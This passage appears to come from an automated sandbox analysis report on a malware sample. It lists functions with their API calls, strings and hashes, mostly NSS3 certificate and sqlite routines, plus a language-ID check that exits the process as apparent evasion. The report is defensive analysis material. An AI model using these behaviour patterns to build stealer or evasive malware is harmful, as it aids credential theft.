Opcode Fuzzy Hash: 3dda12b121a276f904041fb5c051749e96764343813c5ccd78ed7e3fb4de0907
Instruction Fuzzy Hash: 85C17EB1B0021A9BDB10DF28CC80BDBB7B4AF48318F1541A8E94897741E775EE95CF91

Function 6CF765D0 Relevance: 13.8, APIs: 4, Strings: 5, Instructions: 261COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6CF7670B
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,6CF72B2C), ref: 6CF7675E
EnterCriticalSection.KERNEL32(?), ref: 6CF7678E
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,6CF72B2C), ref: 6CF767E1

Strings

Pm, xrefs: 6CF768AA, 6CF76944, 6CF7696B
winUnmapfile1, xrefs: 6CF76964
winUnmapfile2, xrefs: 6CF7698B
winClose, xrefs: 6CF768C5
@m, xrefs: 6CF7662B, 6CF76809

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: @m$Pm$winClose$winUnmapfile1$winUnmapfile2
API String ID: 3168844106-1825997132
Opcode ID: 6eea2e153c948d2689715b1d387e98965e17bb0e1a80548fa8c814d2ad5586f0
Instruction ID: 6589108b28e06d0cd14c23ffbea2108ac52e15fe7ca66b36511783f34346d2fd
Opcode Fuzzy Hash: 6eea2e153c948d2689715b1d387e98965e17bb0e1a80548fa8c814d2ad5586f0
Instruction Fuzzy Hash: 2EA17E36901210DBEF189F64F888B6E3771BF4AB15B14007AFD06DB644DB34E941CBA2

Function 6CF82C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(31F25211), ref: 6CF82C5D

Part of subcall function 6CFE0D30: calloc.MOZGLUE ref: 6CFE0D50
Part of subcall function 6CFE0D30: TlsGetValue.KERNEL32 ref: 6CFE0D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6CF82C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CF82CE0

Part of subcall function 6CF82E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CF82CDA,?,00000000), ref: 6CF82E1E
Part of subcall function 6CF82E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CF82E33
Part of subcall function 6CF82E00: TlsGetValue.KERNEL32 ref: 6CF82E4E
Part of subcall function 6CF82E00: EnterCriticalSection.KERNEL32(?), ref: 6CF82E5E
Part of subcall function 6CF82E00: PL_HashTableLookup.NSS3(?), ref: 6CF82E71
Part of subcall function 6CF82E00: PL_HashTableRemove.NSS3(?), ref: 6CF82E84
Part of subcall function 6CF82E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CF82E96
Part of subcall function 6CF82E00: PR_Unlock.NSS3 ref: 6CF82EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CF82D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6CF82D30
CERT_MakeCANickname.NSS3(00000001), ref: 6CF82D3F
free.MOZGLUE(00000000), ref: 6CF82D73
CERT_DestroyCertificate.NSS3(?), ref: 6CF82DB8
free.MOZGLUE ref: 6CF82DC8

Part of subcall function 6CF83E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CF83EC2
Part of subcall function 6CF83E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CF83ED6
Part of subcall function 6CF83E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CF83EEE
Part of subcall function 6CF83E60: PR_CallOnce.NSS3(6D0E2AA4,6CFE12D0), ref: 6CF83F02
Part of subcall function 6CF83E60: PL_FreeArenaPool.NSS3 ref: 6CF83F14
Part of subcall function 6CF83E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CF83F27

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: b9353c778df06b71cec303402d95de3a05c815edc52ad21d39f6e8852d8d861a
Instruction ID: 464a968883b2dce30144f0bf319b18f51a07a4a0ab74d288cffb22855789d8ec
Opcode Fuzzy Hash: b9353c778df06b71cec303402d95de3a05c815edc52ad21d39f6e8852d8d861a
Instruction Fuzzy Hash: 6A51DF72A063129BEB109F29DC89B6B7BF5EF84308F150429EC5593650EB32F815CB92

Function 6CFE4DF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6CFE536F,00000022,?,?,00000000,?), ref: 6CFE4E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6CFE4F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6CFE4F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6CFE4FAE
free.MOZGLUE(?), ref: 6CFE4FC8

Strings

%s=%c%s%c, xrefs: 6CFE4FA9
%s=%s, xrefs: 6CFE4F89

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s
API String ID: 2709355791-2032576422
Opcode ID: e65f5d22a8dc3675f376282bc780b7b55dd76064fc50ebdc89e08e152ffe12c4
Instruction ID: caa09f55f926eaf3014d5b2c7e458daf3d3f717078033eb5796b835713a486c9
Opcode Fuzzy Hash: e65f5d22a8dc3675f376282bc780b7b55dd76064fc50ebdc89e08e152ffe12c4
Instruction Fuzzy Hash: 70512B31E05286ABEB01CBEA84507FF7FF59F4E308F18816EE894A7A41D335980587A1

Function 6CF98CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6CFA124D,00000001), ref: 6CF98D19
EnterCriticalSection.KERNEL32(?,?,?,?,6CFA124D,00000001), ref: 6CF98D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6CFA124D,00000001), ref: 6CF98D73
PR_Unlock.NSS3(?,?,?,?,?,6CFA124D,00000001), ref: 6CF98D8C

Part of subcall function 6D02DD70: TlsGetValue.KERNEL32 ref: 6D02DD8C
Part of subcall function 6D02DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D02DDB4

PR_Unlock.NSS3(?,?,?,?,?,6CFA124D,00000001), ref: 6CF98DBA

Strings

KRAM, xrefs: 6CF98CF9
KRAM, xrefs: 6CF98D3E

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: 645babadb83bb406977df24b52866937fafd07d8bb63bce552b0f4645bdc8237
Instruction ID: 75cbda570bbe81a220ad96fdaf0c8730dc16116d62000d75ad124847b29e5b9c
Opcode Fuzzy Hash: 645babadb83bb406977df24b52866937fafd07d8bb63bce552b0f4645bdc8237
Instruction Fuzzy Hash: 02215AB5A046018FEF40AF38C48465ABBF0FF85318F15896AD9988B711EB35D882CB91

Function 6D054D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6D054DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D054DE0

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D054DCB
invalid, xrefs: 6D054DB8
API call with %s database connection pointer, xrefs: 6D054DBD
misuse, xrefs: 6D054DD5
%s at line %d of [%.10s], xrefs: 6D054DDA

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 15da5d95f80050da15a89aa93134eca0d4798731558f38d5a40739388c40d241
Instruction ID: e1cb2eba056ddcb37d6581f1037513ece6597f3dcf650df9339ba363052a8b32
Opcode Fuzzy Hash: 15da5d95f80050da15a89aa93134eca0d4798731558f38d5a40739388c40d241
Instruction Fuzzy Hash: 97F0B421E18965BBF7015116CE10FF637955F09315F4610A1ED0C6B293D627D97082E1

Function 6D054DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6D054E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D054E4D

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D054E38
invalid, xrefs: 6D054E25
API call with %s database connection pointer, xrefs: 6D054E2A
misuse, xrefs: 6D054E42
%s at line %d of [%.10s], xrefs: 6D054E47

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 2e2554e0718d7cc1a3dc8c0ef68cbe7bc85dd83b14684aab8ed9ffbb563e8b40
Instruction ID: 934f28dfd586786b3b2fa870cbf3688599d48f9d4619770ef87d52a40258e043
Opcode Fuzzy Hash: 2e2554e0718d7cc1a3dc8c0ef68cbe7bc85dd83b14684aab8ed9ffbb563e8b40
Instruction Fuzzy Hash: 9EF02711E489293BF71110259E14FF637C98B09325F4520A1EE0D672D3DB37D97082D1

Function 00416A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32(?,?,00416CC6,00420AF3), ref: 00416A14
ExitProcess.KERNEL32 ref: 00416A45
ExitProcess.KERNEL32 ref: 00416A4F
ExitProcess.KERNEL32 ref: 00416A59
ExitProcess.KERNEL32 ref: 00416A63
ExitProcess.KERNEL32 ref: 00416A6D

Strings

*, xrefs: 00416A2C

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: 8ad7487ebdf551ce844e744865076748c7b192adeb82af89cb9554ed9750e1ed
Instruction ID: 485b87df60e927c5081145715141aeea1c9fd48c6e3f29f258bd7afdae13bdb0
Opcode Fuzzy Hash: 8ad7487ebdf551ce844e744865076748c7b192adeb82af89cb9554ed9750e1ed
Instruction Fuzzy Hash: AFF0E232D8E218EFD3409FE0EC0979CFB31EB05707F064296F60996190E6708A80CB52

Function 6CFC0C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6CFC1444,?,00000001,?,00000000,00000000,?,?,6CFC1444,?,?,00000000,?,?), ref: 6CFC0CB3

Part of subcall function 6D02C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D02C2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CFC1444,?,00000001,?,00000000,00000000,?,?,6CFC1444,?), ref: 6CFC0DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6CFC1444,?,00000001,?,00000000,00000000,?,?,6CFC1444,?), ref: 6CFC0DEC

Part of subcall function 6CFE0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CF82AF5,?,?,?,?,?,6CF80A1B,00000000), ref: 6CFE0F1A
Part of subcall function 6CFE0F10: malloc.MOZGLUE(00000001), ref: 6CFE0F30
Part of subcall function 6CFE0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CFE0F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6CFC1444,?,00000001,?,00000000,00000000,?), ref: 6CFC0DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6CFC1444,?,00000001,?,00000000), ref: 6CFC0E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CFC1444,?,00000001,?,00000000,00000000,?), ref: 6CFC0E53
PR_GetCurrentThread.NSS3(?,?,?,?,6CFC1444,?,00000001,?,00000000,00000000,?,?,6CFC1444,?,?,00000000), ref: 6CFC0E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CFC1444,?,00000001,?,00000000,00000000,?), ref: 6CFC0E79

Part of subcall function 6CFD1560: TlsGetValue.KERNEL32(00000000,?,6CFA0844,?), ref: 6CFD157A
Part of subcall function 6CFD1560: EnterCriticalSection.KERNEL32(?,?,?,6CFA0844,?), ref: 6CFD158F
Part of subcall function 6CFD1560: PR_Unlock.NSS3(?,?,?,?,6CFA0844,?), ref: 6CFD15B2

Part of subcall function 6CF9B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6CFA1397,00000000,?,6CF9CF93,5B5F5EC0,00000000,?,6CFA1397,?), ref: 6CF9B1CB
Part of subcall function 6CF9B1A0: free.MOZGLUE(5B5F5EC0,?,6CF9CF93,5B5F5EC0,00000000,?,6CFA1397,?), ref: 6CF9B1D2

Part of subcall function 6CF989E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6CF988AE,-00000008), ref: 6CF98A04
Part of subcall function 6CF989E0: EnterCriticalSection.KERNEL32(?), ref: 6CF98A15
Part of subcall function 6CF989E0: memset.VCRUNTIME140(6CF988AE,00000000,00000132), ref: 6CF98A27
Part of subcall function 6CF989E0: PR_Unlock.NSS3(?), ref: 6CF98A35

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: fad944f81c65a290f3363c25e13df70e511d17cd46aaa0a4838afb722f251795
Instruction ID: 8f0ebc248571ecd3bf0fc5babbc26092b5f30879a2d96da6c34743abc6eb6877
Opcode Fuzzy Hash: fad944f81c65a290f3363c25e13df70e511d17cd46aaa0a4838afb722f251795
Instruction Fuzzy Hash: 665195F6F00201AFEB009F64DC81BAB77A8AF45718F154464ED0997712EB71ED1A86A3

Function 6CFEC6E0 Relevance: 12.1, APIs: 8, Instructions: 149COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,?,?,?,?,6CFE71CF,?), ref: 6CFEC70F

Part of subcall function 6CFE07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CF88298,?,?,?,6CF7FCE5,?), ref: 6CFE07BF
Part of subcall function 6CFE07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CFE07E6
Part of subcall function 6CFE07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CFE081B
Part of subcall function 6CFE07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CFE0825

CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6CFE71CF,?), ref: 6CFEC7B1

Part of subcall function 6CF895B0: TlsGetValue.KERNEL32(00000000,?,6CFA00D2,00000000), ref: 6CF895D2
Part of subcall function 6CF895B0: EnterCriticalSection.KERNEL32(?,?,?,6CFA00D2,00000000), ref: 6CF895E7
Part of subcall function 6CF895B0: PR_Unlock.NSS3(?,?,?,?,6CFA00D2,00000000), ref: 6CF89605

PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,?,?,6CFE71CF,?), ref: 6CFEC7D5
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6CFE71CF,?), ref: 6CFEC811
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6CFE71CF,?), ref: 6CFEC841
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CFEC855
PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,?,?,6CFE71CF,?), ref: 6CFEC868

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Util$Arena_CertificateDestroyFree$ErrorHashLookupTable$ConstCriticalEnterFindSectionUnlockValue
String ID:
API String ID: 1768726504-0
Opcode ID: fc537cff35ca18c10af1df844d24871b5193ba69ef4e89025439c59b561f8c00
Instruction ID: 6330bb39728efc986b8e9f11dba99001c429777919fecb7d4e5a9d81b1ec837a
Opcode Fuzzy Hash: fc537cff35ca18c10af1df844d24871b5193ba69ef4e89025439c59b561f8c00
Instruction Fuzzy Hash: 79418372F01201ABFB10EE16DD80B567BE9AF09758B294168FC29DBB52E770F904C691

Function 6CFD2470 Relevance: 12.1, APIs: 8, Instructions: 141COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6CFD2D7C,6CFA9192,?), ref: 6CFD248E
EnterCriticalSection.KERNEL32(02B80138), ref: 6CFD24A2
memset.VCRUNTIME140(6CFD2D7C,00000020,6CFD2D5C), ref: 6CFD250E
memset.VCRUNTIME140(6CFD2D9C,00000020,6CFD2D7C), ref: 6CFD2535
memset.VCRUNTIME140(?,00000020,?), ref: 6CFD255C
memset.VCRUNTIME140(?,00000020,?), ref: 6CFD2583
PR_Unlock.NSS3(?), ref: 6CFD2594
PR_SetError.NSS3(00000000,00000000), ref: 6CFD25AF

Part of subcall function 6D02C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D02C2BF

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: memset$Value$CriticalEnterErrorSectionUnlock
String ID:
API String ID: 2972906980-0
Opcode ID: 543bcaccea4726890892691802e4c827c6009a54e2094de6affc7d6b232d3b25
Instruction ID: 0aa4aff178e5c714212f33b6e9af439c09b89d65cee4fe1431b5a1953d75f075
Opcode Fuzzy Hash: 543bcaccea4726890892691802e4c827c6009a54e2094de6affc7d6b232d3b25
Instruction Fuzzy Hash: 704106B1E102015BEB009F34CC98BA93774BB99319F1A1668DD05DB652F772FE84C2D1

Function 6CFD05A0 Relevance: 12.1, APIs: 8, Instructions: 127memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000000), ref: 6CFD05DA

Part of subcall function 6CFE0BE0: malloc.MOZGLUE(6CFD8D2D,?,00000000,?), ref: 6CFE0BF8
Part of subcall function 6CFE0BE0: TlsGetValue.KERNEL32(6CFD8D2D,?,00000000,?), ref: 6CFE0C15

TlsGetValue.KERNEL32(00000000), ref: 6CFD060C
EnterCriticalSection.KERNEL32 ref: 6CFD0629
TlsGetValue.KERNEL32(00000000), ref: 6CFD066F
EnterCriticalSection.KERNEL32 ref: 6CFD068C
PR_Unlock.NSS3 ref: 6CFD06AA
PK11_GetNextSafe.NSS3 ref: 6CFD06C3
PR_Unlock.NSS3 ref: 6CFD06F9

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$Alloc_K11_NextSafeUtilmalloc
String ID:
API String ID: 1593870348-0
Opcode ID: 99bfbc9d7a211394ab4d8efad7700b66caa281fb9906783d0bc384705e372dfd
Instruction ID: 6b99cf41305fd7202ac6f9fec28ff2f34ba9783444dddc88500079909f1a4e17
Opcode Fuzzy Hash: 99bfbc9d7a211394ab4d8efad7700b66caa281fb9906783d0bc384705e372dfd
Instruction Fuzzy Hash: 7B5117B4A057468FDB00DF79C48466ABBF4BF45318F16896AD899DB701EBB0E480CB91

Function 6CFDA470 Relevance: 12.1, APIs: 8, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CFDA4A6

